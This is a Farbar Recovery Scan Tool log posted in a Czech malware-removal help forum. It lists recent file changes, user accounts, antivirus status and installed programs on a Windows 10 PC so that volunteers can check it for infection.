2021-01-20 08:45 - 2021-01-20 09:01 - 000000000 ____D C:\ProgramData\GlarySoft
2021-01-20 08:45 - 2021-01-20 09:01 - 000000000 ____D C:\Program Files (x86)\Glarysoft
2021-01-20 08:16 - 2021-01-20 10:15 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\GridinSoft Anti-Malware
2021-01-20 08:16 - 2021-01-20 08:16 - 000000000 ____D C:\ProgramData\GridinSoft
2021-01-20 07:13 - 2021-01-20 18:05 - 000000000 ____D C:\Users\IRENA-PC\Desktop\FRST-OlderVersion
2021-01-14 04:09 - 2021-01-14 04:09 - 000000000 ___RD C:\Users\IRENA-PC\ODBA
2021-01-13 21:51 - 2021-01-13 21:51 - 000581120 _____ (Microsoft Corporation) C:\WINDOWS\system32\PhotoScreensaver.scr
2021-01-13 21:51 - 2021-01-13 21:51 - 000499200 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PhotoScreensaver.scr
2021-01-13 21:51 - 2021-01-13 21:51 - 000467968 _____ C:\WINDOWS\system32\AssignedAccessCsp.dll
2021-01-13 21:51 - 2021-01-13 21:51 - 000234496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ksproxy.ax
2021-01-13 21:51 - 2021-01-13 21:51 - 000157184 _____ C:\WINDOWS\system32\uwfcsp.dll
2021-01-13 21:51 - 2021-01-13 21:51 - 000138056 _____ C:\WINDOWS\system32\HvsiManagementApi.dll
2021-01-13 21:51 - 2021-01-13 21:51 - 000135168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\VBICodec.ax
2021-01-13 21:51 - 2021-01-13 21:51 - 000101704 _____ C:\WINDOWS\SysWOW64\HvsiManagementApi.dll
2021-01-13 21:51 - 2021-01-13 21:51 - 000095744 _____ C:\WINDOWS\system32\VirtualMonitorManager.dll
2021-01-13 21:51 - 2021-01-13 21:51 - 000067584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wscui.cpl
2021-01-13 21:50 - 2021-01-13 21:50 - 000729600 _____ (Microsoft Corporation) C:\WINDOWS\system32\hhctrl.ocx
2021-01-13 21:50 - 2021-01-13 21:50 - 000595968 _____ (Microsoft Corporation) C:\WINDOWS\system32\appwiz.cpl
2021-01-13 21:50 - 2021-01-13 21:50 - 000575488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\hhctrl.ocx
2021-01-13 21:50 - 2021-01-13 21:50 - 000469504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\appwiz.cpl
2021-01-13 21:50 - 2021-01-13 21:50 - 000455680 _____ C:\WINDOWS\SysWOW64\WindowManagementAPI.dll
2021-01-13 21:50 - 2021-01-13 21:50 - 000446976 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mmsys.cpl
2021-01-13 21:50 - 2021-01-13 21:50 - 000304128 _____ (Microsoft Corporation) C:\WINDOWS\system32\ksproxy.ax
2021-01-13 21:50 - 2021-01-13 21:50 - 000178688 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\intl.cpl
2021-01-13 21:50 - 2021-01-13 21:50 - 000170496 _____ (Microsoft Corporation) C:\WINDOWS\system32\VBICodec.ax
2021-01-13 21:50 - 2021-01-13 21:50 - 000087552 _____ (Microsoft Corporation) C:\WINDOWS\system32\tdc.ocx
2021-01-13 21:50 - 2021-01-13 21:50 - 000084992 _____ (Microsoft Corporation) C:\WINDOWS\system32\wscui.cpl
2021-01-13 21:50 - 2021-01-13 21:50 - 000072704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tdc.ocx
2021-01-13 21:50 - 2021-01-13 21:50 - 000067072 _____ C:\WINDOWS\system32\BWContextHandler.dll
2021-01-13 21:50 - 2021-01-13 21:50 - 000053760 _____ C:\WINDOWS\SysWOW64\BWContextHandler.dll
2021-01-13 21:50 - 2021-01-13 21:50 - 000010894 _____ C:\WINDOWS\system32\DrtmAuthTxt.wim
2021-01-13 21:49 - 2021-01-13 21:49 - 002254336 _____ C:\WINDOWS\system32\dwmscene.dll
2021-01-13 21:49 - 2021-01-13 21:49 - 001333760 _____ C:\WINDOWS\SysWOW64\TextInputMethodFormatter.dll
2021-01-13 21:49 - 2021-01-13 21:49 - 001162240 _____ C:\WINDOWS\system32\MBR2GPT.EXE
2021-01-13 21:49 - 2021-01-13 21:49 - 000643072 _____ C:\WINDOWS\system32\WindowManagementAPI.dll
2021-01-13 21:49 - 2021-01-13 21:49 - 000544768 _____ (Microsoft Corporation) C:\WINDOWS\system32\mmsys.cpl
2021-01-13 21:49 - 2021-01-13 21:49 - 000422912 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winspool.drv
2021-01-13 21:49 - 2021-01-13 21:49 - 000330752 _____ C:\WINDOWS\SysWOW64\ssdm.dll
2021-01-13 21:49 - 2021-01-13 21:49 - 000238592 _____ (Microsoft Corporation) C:\WINDOWS\system32\intl.cpl
2021-01-13 21:49 - 2021-01-13 21:49 - 000235520 _____ C:\WINDOWS\SysWOW64\HeatCore.dll
2021-01-13 21:49 - 2021-01-13 21:49 - 000190976 _____ C:\WINDOWS\system32\BthpanContextHandler.dll
2021-01-13 21:49 - 2021-01-13 21:49 - 000182272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\timedate.cpl
2021-01-13 21:49 - 2021-01-13 21:49 - 000152064 _____ C:\WINDOWS\system32\EoAExperiences.exe
2021-01-13 21:48 - 2021-01-13 21:48 - 002260992 _____ C:\WINDOWS\system32\TextInputMethodFormatter.dll
2021-01-13 21:48 - 2021-01-13 21:48 - 000306688 _____ C:\WINDOWS\system32\HeatCore.dll
2021-01-13 21:43 - 2021-01-13 21:43 - 000562688 _____ (Microsoft Corporation) C:\WINDOWS\system32\winspool.drv
2021-01-13 21:43 - 2021-01-13 21:43 - 000455168 _____ C:\WINDOWS\system32\ssdm.dll
2021-01-13 21:43 - 2021-01-13 21:43 - 000243200 _____ (Microsoft Corporation) C:\WINDOWS\system32\timedate.cpl
2021-01-13 21:43 - 2021-01-13 21:43 - 000165888 _____ C:\WINDOWS\system32\DataStoreCacheDumpTool.exe
2021-01-13 21:43 - 2021-01-13 21:43 - 000074240 _____ C:\WINDOWS\system32\rdsxvmaudio.dll
2021-01-13 14:04 - 2021-01-20 19:43 - 000000000 ____D C:\FRST
2021-01-13 14:00 - 2021-01-20 18:05 - 002295808 _____ (Farbar) C:\Users\IRENA-PC\Desktop\FRST64.exe
2021-01-09 18:46 - 2021-01-10 08:09 - 000002567 _____ C:\Users\IRENA-PC\Desktop\YouTube Music (2).lnk
2021-01-09 15:47 - 2021-01-09 15:47 - 000000401 _____ C:\DelFix.txt
2021-01-09 15:07 - 2021-01-09 15:07 - 000000000 ____D C:\ProgramData\Malwarebytes
2021-01-09 08:12 - 2021-01-09 08:12 - 000000000 ____D C:\Program Files (x86)\PrivaZer
2021-01-07 13:56 - 2021-01-07 13:56 - 000000000 ____D C:\WINDOWS\system32\Tasks\Mozilla
2021-01-07 09:04 - 2021-01-09 08:06 - 000000000 ____D C:\Program Files\Mozilla Firefox
2021-01-03 08:36 - 2021-01-16 10:12 - 000000000 ____D C:\Users\IRENA-PC\AppData\Roaming\Exodus
2021-01-03 08:36 - 2021-01-16 10:02 - 000002280 _____ C:\Users\IRENA-PC\Desktop\Exodus.lnk
2021-01-03 08:36 - 2021-01-16 10:02 - 000000000 ____D C:\Users\IRENA-PC\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Exodus Movement Inc
2021-01-03 08:36 - 2021-01-16 10:02 - 000000000 ____D C:\Users\IRENA-PC\AppData\Local\exodus
2020-12-26 19:07 - 2020-12-27 17:58 - 000000000 ___RD C:\Users\IRENA-PC\Dropbox
2020-12-26 18:55 - 2020-12-26 18:55 - 000669800 _____ (Dropbox, Inc.) C:\Users\IRENA-PC\Downloads\DropboxInstaller.exe
2020-12-21 09:07 - 2021-01-09 15:16 - 000002869 _____ C:\Users\IRENA-PC\Desktop\YouTube Music (1).lnk

==================== One month (modified) ==================

(If an entry is included in the fixlist, the file/folder will be moved.)

2021-01-20 19:39 - 2020-08-19 19:06 - 000000000 ____D C:\WINDOWS\system32\SleepStudy
2021-01-20 19:38 - 2019-12-07 10:14 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2021-01-20 19:33 - 2020-08-19 19:15 - 001693136 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2021-01-20 19:33 - 2019-12-07 15:43 - 000716742 _____ C:\WINDOWS\system32\perfh005.dat
2021-01-20 19:33 - 2019-12-07 15:43 - 000144920 _____ C:\WINDOWS\system32\perfc005.dat
2021-01-20 19:33 - 2019-12-07 10:13 - 000000000 ____D C:\WINDOWS\INF
2021-01-20 19:28 - 2020-08-19 19:19 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT
2021-01-20 19:28 - 2020-08-19 19:06 - 000008192 ___SH C:\DumpStack.log.tmp
2021-01-20 19:28 - 2018-12-26 18:07 - 000000000 ____D C:\Program Files (x86)\TeamViewer
2021-01-20 19:27 - 2019-12-07 10:03 - 000524288 _____ C:\WINDOWS\system32\config\BBI
2021-01-20 19:21 - 2020-06-30 17:37 - 000002296 ____H C:\Users\IRENA-PC\Documents\Default.rdp
2021-01-20 18:22 - 2019-12-07 10:14 - 000000000 ___HD C:\Program Files\WindowsApps
2021-01-20 18:22 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\AppReadiness
2021-01-20 13:09 - 2017-11-05 22:29 - 000000000 ____D C:\Users\IRENA-PC\AppData\Local\Packages
2021-01-20 12:56 - 2020-09-06 10:11 - 000000000 ____D C:\Users\IRENA-PC\AppData\Local\PrivaZer
2021-01-20 11:10 - 2017-03-10 18:17 - 000044146 _____ C:\Users\IRENA-PC\Documents\klikačky.txt
2021-01-20 10:02 - 2017-01-30 08:45 - 000000000 ____D C:\Users\IRENA-PC\AppData\LocalLow\Mozilla
2021-01-20 09:46 - 2019-02-05 07:34 - 000000000 ____D C:\ProgramData\Mozilla
2021-01-20 08:48 - 2018-05-16 16:28 - 000000000 ____D C:\Users\IRENA-PC\AppData\Local\Kryptex
2021-01-20 08:17 - 2018-06-14 10:05 - 000000000 ____D C:\Users\IRENA-PC\AppData\Local\JDownloader 2.0
2021-01-20 07:08 - 2020-08-19 19:19 - 000003584 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineUA
2021-01-20 07:08 - 2020-08-19 19:19 - 000003460 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineCore
2021-01-17 13:54 - 2017-07-05 17:16 - 000000000 ____D C:\Users\IRENA-PC\AppData\Roaming\vlc
2021-01-15 07:06 - 2019-12-07 10:14 - 000000000 ___HD C:\WINDOWS\ELAMBKUP
2021-01-14 04:09 - 2020-08-19 19:07 - 000000000 ____D C:\Users\IRENA-PC
2021-01-13 22:05 - 2019-12-07 15:47 - 000000000 ____D C:\Program Files\Windows Photo Viewer
2021-01-13 22:05 - 2019-12-07 15:47 - 000000000 ____D C:\Program Files\Windows Defender Advanced Threat Protection
2021-01-13 22:05 - 2019-12-07 15:47 - 000000000 ____D C:\Program Files (x86)\Windows Photo Viewer
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ___SD C:\WINDOWS\SysWOW64\F12
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ___SD C:\WINDOWS\SysWOW64\DiagSvcs
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ___SD C:\WINDOWS\system32\UNP
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ___SD C:\WINDOWS\system32\F12
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ___SD C:\WINDOWS\system32\DiagSvcs
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ___RD C:\WINDOWS\PrintDialog
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ___RD C:\WINDOWS\ImmersiveControlPanel
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\setup
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\PerceptionSimulation
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\oobe
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\Dism
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\Com
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\AdvancedInstallers
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SystemResources
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\WinBioPlugIns
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\SystemResetPlatform
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\Sysprep
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\setup
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\PerceptionSimulation
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\oobe
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\Dism
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\Com
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\AdvancedInstallers
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\ShellExperiences
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\ShellComponents
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\Provisioning
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\PolicyDefinitions
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\IME
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\bcastdvr
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\Program Files\Windows Defender
2021-01-13 21:55 - 2019-12-07 10:03 - 000000000 ____D C:\WINDOWS\CbsTemp
2021-01-13 21:43 - 2020-08-19 19:08 - 002877952 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PrintConfig.dll
2021-01-13 21:32 - 2017-01-29 22:43 - 000000000 ____D C:\WINDOWS\system32\MRT
2021-01-13 21:28 - 2017-01-29 22:43 - 135062968 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2021-01-13 13:42 - 2019-04-16 19:31 - 000018134 _____ C:\Users\IRENA-PC\Documents\web hlavní stránka.txt
2021-01-11 20:14 - 2018-10-14 17:50 - 000000000 ____D C:\Users\IRENA-PC\AppData\Roaming\avidemux
2021-01-10 14:44 - 2019-03-19 10:59 - 000000000 ____D C:\Users\IRENA-PC\Downloads\Ulozto
2021-01-09 18:46 - 2017-02-16 12:26 - 000000000 ____D C:\Users\IRENA-PC\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Aplikace Chrome
2021-01-09 18:43 - 2017-12-16 15:22 - 000000000 ____D C:\Program Files (x86)\IQ Option
2021-01-09 15:16 - 2020-05-06 13:44 - 000002563 _____ C:\Users\IRENA-PC\Desktop\YouTube Music.lnk
2021-01-09 15:16 - 2020-03-26 15:41 - 000002689 _____ C:\Users\IRENA-PC\Desktop\SS TV Remote.lnk
2021-01-09 08:06 - 2017-01-30 08:44 - 000000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2021-01-08 13:28 - 2020-06-04 19:19 - 000002419 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Edge.lnk
2021-01-07 13:56 - 2017-01-30 08:44 - 000001005 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Firefox.lnk
2021-01-07 07:09 - 2020-03-23 13:20 - 000002301 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2021-01-07 07:09 - 2020-03-23 13:20 - 000002260 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2021-01-05 10:28 - 2020-07-25 06:20 - 000000000 ____D C:\Users\IRENA-PC\Downloads\Telegram Desktop
2021-01-05 10:17 - 2019-10-29 08:35 - 000000000 ____D C:\Users\IRENA-PC\AppData\Roaming\Telegram Desktop
2021-01-03 17:07 - 2018-02-16 13:35 - 000000000 ____D C:\Users\IRENA-PC\AppData\Roaming\Authy Desktop
2021-01-03 10:57 - 2019-01-02 09:37 - 000000000 ____D C:\Users\IRENA-PC\AppData\Roaming\HandBrake
2021-01-03 08:36 - 2018-02-16 13:35 - 000000000 ____D C:\Users\IRENA-PC\AppData\Local\SquirrelTemp
2020-12-28 18:45 - 2019-07-07 19:03 - 000001086 _____ C:\Users\IRENA-PC\Documents\telenovely.txt
2020-12-23 20:11 - 2017-04-27 15:39 - 000000000 ____D C:\Users\IRENA-PC\AppData\Roaming\Ulozto File Manager
2020-12-22 18:29 - 2020-08-19 19:19 - 000004562 _____ C:\WINDOWS\system32\Tasks\Adobe Acrobat Update Task
2020-12-22 18:28 - 2020-12-15 18:05 - 000002136 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
2020-12-22 13:54 - 2019-10-12 11:58 - 000001382 _____ C:\Users\Public\Desktop\Free Netflix Download.lnk
2020-12-22 13:54 - 2019-10-12 11:58 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\FreeGrabApp
2020-12-22 13:54 - 2019-10-12 11:58 - 000000000 ____D C:\Program Files (x86)\FreeGrabApp

==================== Files in the root of some directories ========

2019-01-25 08:47 - 2019-02-04 08:42 - 000012386 _____ () C:\Users\IRENA-PC\AppData\Roaming\downloads.json

==================== SigCheck ============================

(There is no automatic fix for files that do not pass verification.)

==================== End of FRST.txt ========================

Re: Prosím o kontrolu logu

Napsal: 20 led 2021 19:50
od chenny
ADDITION log

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 20-01-2021
Ran by IRENA-PC (20-01-2021 19:46:07)
Running from C:\Users\IRENA-PC\Desktop
Windows 10 Pro Version 2004 19041.746 (X64) (2020-08-19 18:19:30)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

Administrator (S-1-5-21-3708313529-2431682257-2596704864-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-3708313529-2431682257-2596704864-503 - Limited - Disabled)
defaultuser0 (S-1-5-21-3708313529-2431682257-2596704864-1000 - Limited - Disabled)
Guest (S-1-5-21-3708313529-2431682257-2596704864-501 - Limited - Disabled)
IRENA-PC (S-1-5-21-3708313529-2431682257-2596704864-1001 - Administrator - Enabled) => C:\Users\IRENA-PC
WDAGUtilityAccount (S-1-5-21-3708313529-2431682257-2596704864-504 - Limited - Disabled)

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: Malwarebytes (Enabled - Up to date) {23007AD3-69FE-687C-2629-D584AFFAF72B}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

„Microsoft Office Proofing Tools 2016“ – lietuvių k. (HKLM\...\{90160000-001F-0427-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
7-Zip 16.04 (x64) (HKLM\...\7-Zip) (Version: 16.04 - Igor Pavlov)
Adobe Acrobat Reader DC - Czech (HKLM-x32\...\{AC76BA86-7AD7-1029-7B44-AC0F074E4100}) (Version: 20.013.20074 - Adobe Systems Incorporated)
Adobe Photoshop CC 2019 (HKLM-x32\...\PHSP_20_0_4) (Version: 20.0.4 - Adobe Systems Incorporated)
Aimersoft Helper Compact 2.5.2 (HKLM-x32\...\{405147F7-FCC5-499B-A27E-EA6BD4A80435}_is1) (Version: 2.5.2 - Aimersoft)
Alati za jezičnu provjeru u sustavu Microsoft Office 2016 - hrvatski (HKLM\...\{90160000-001F-041A-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Authy Desktop (HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\authy) (Version: 1.8.3 - Twilio Inc.)
Avidemux 2.7 - 64 bits (HKLM-x32\...\Avidemux 2.7 - 64 bits (64-bit)) (Version: 2.7.1.180604 - )
Avidemux VC++ 64bits (HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\{3598910c-c7d9-450b-bfde-5a8d49dabd30}) (Version: 2.7.3 - Mean)
Avidemux VC++ 64bits (HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\{8cbf4d89-2ce8-4178-8bb4-1600f5e69e65}) (Version: 2.7.3 - Mean)
Avidemux VC++ 64bits (HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\{b859fd90-1d56-4013-8e47-a727a65ae7a3}) (Version: 2.7.3 - Mean)
Avidemux VC++ 64bits (HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\{c28b1ebe-2fed-4e19-a347-e0629e5cf6f5}) (Version: 2.7.2 - Mean)
Bighits4U Viewer 3.6 (HKLM-x32\...\{ACC1EF6D-F9C2-4B5E-BA01-25F3F9E57B68}) (Version: 3.6.0 - BigHits4U) Hidden
Bighits4U Viewer 3.6 (HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\Bighits4U Viewer 3.6 3.6.0) (Version: 3.6.0 - BigHits4U)
Công cụ Soát lỗi Microsoft Office 2016 - Tiếng Việt (HKLM\...\{90160000-001F-042A-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Eines de correcció del Microsoft Office 2016: català (HKLM\...\{90160000-001F-0403-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Exodus (HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\exodus) (Version: 21.1.15 - Exodus Movement Inc)
Ferramentas de Verificação do Microsoft Office 2016 - Português (HKLM\...\{90160000-001F-0816-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Ferramentas de verificación de Microsoft Office 2016 - Galego (HKLM\...\{90160000-001F-0456-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Free MP3 Cutter 1.01 (HKLM-x32\...\{847E0734-4457-4B48-BF49-998D1CF2CFA1}_is1) (Version: - PolySoft Solutions)
Free Netflix Download version 5.0.16.1204 (HKLM-x32\...\Free Netflix Download_is1) (Version: 5.0.16.1204 - FreeGrabApp Ltd)
GhostMouse (HKLM-x32\...\GhostMouse_is1) (Version: Free V3.2.3 - ghost-mouse.com)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 87.0.4280.141 - Google LLC)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.36.51 - Google LLC) Hidden
Greenshot 1.2.9.129 (HKLM\...\Greenshot_is1) (Version: 1.2.9.129 - Greenshot)
HandBrake 1.2.2 (HKLM-x32\...\HandBrake) (Version: 1.2.2 - )
Herramientas de corrección de Microsoft Office 2016: español (HKLM\...\{90160000-001F-0C0A-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
I-Microsoft Office Proofing Tools 2016 - IsiZulu (HKLM\...\{90160000-001F-0435-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Innealan-dearbhaidh Microsoft Office 2016 - Gàidhlig (HKLM\...\{90160000-001F-0491-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Instrumente de verificare Microsoft Office 2016 - Română (HKLM\...\{90160000-001F-0418-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Java 8 Update 271 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180271F0}) (Version: 8.0.2710.9 - Oracle Corporation)
JDownloader 2 (HKLM\...\jdownloader2) (Version: 2.0 - AppWork GmbH)
Korrekturredskaber til Microsoft Office 2016 - Dansk (HKLM\...\{90160000-001F-0406-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Korrekturverktøy for Microsoft Office 2016 – norsk (bokmål) (HKLM\...\{90160000-001F-0414-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Korrekturverktøy for Microsoft Office 2016 – norsk (nynorsk) (HKLM\...\{90160000-001F-0814-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
MediaInfo 18.05 (HKLM\...\MediaInfo) (Version: 18.05 - MediaArea.net)
Microsoft Edge (HKLM-x32\...\Microsoft Edge) (Version: 87.0.664.75 - Microsoft Corporation)
Microsoft Edge Update (HKLM-x32\...\Microsoft Edge Update) (Version: 1.3.139.71 - )
Microsoft Office Professional Plus 2016 (HKLM\...\Office16.PROPLUS) (Version: 16.0.4266.1001 - Microsoft Corporation)
Microsoft Office Proofing Tools Kit Compilation 2016 (HKLM\...\Office16.PROOFKIT) (Version: 16.0.4266.1001 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\OneDriveSetup.exe) (Version: 20.201.1005.0009 - Microsoft Corporation)
Microsoft Project Professional 2016 (HKLM\...\Office16.PRJPRO) (Version: 16.0.4266.1001 - Microsoft Corporation)
Microsoft Visio Professional 2016 (HKLM\...\Office16.VISPRO) (Version: 16.0.4266.1001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.21005 (HKLM-x32\...\{7f51bdb9-ee21-49ee-94d6-90afc321780e}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.40660 (HKLM-x32\...\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}) (Version: 12.0.40660.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.21005 (HKLM-x32\...\{ce085a78-074e-4823-8dc1-8a721b94b76d}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.40660 (HKLM-x32\...\{61087a79-ac85-455c-934d-1fa22cc64f36}) (Version: 12.0.40660.0 - Microsoft Corporation)
Microsoft Visual C++ 2017 Redistributable (x64) - 14.15.26706 (HKLM-x32\...\{95ac1cfa-f4fb-4d1b-8912-7f9d5fbb140d}) (Version: 14.15.26706.0 - Microsoft Corporation)
Microsoft Visual C++ 2017 Redistributable (x86) - 14.15.26706 (HKLM-x32\...\{7e9fae12-5bbf-47fb-b944-09c49e75c061}) (Version: 14.15.26706.0 - Microsoft Corporation)
Mozilla Firefox 84.0.2 (x64 cs) (HKLM\...\Mozilla Firefox 84.0.2 (x64 cs)) (Version: 84.0.2 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 55.0.1 - Mozilla)
Mp3tag v2.97 (HKLM-x32\...\Mp3tag) (Version: 2.97 - Florian Heidenreich)
Narzędzia sprawdzające pakietu Microsoft Office 2016 — polski (HKLM\...\{90160000-001F-0415-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Nástroje kontroly pravopisu pro Microsoft Office 2016 – čeština (HKLM\...\{90160000-001F-0405-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
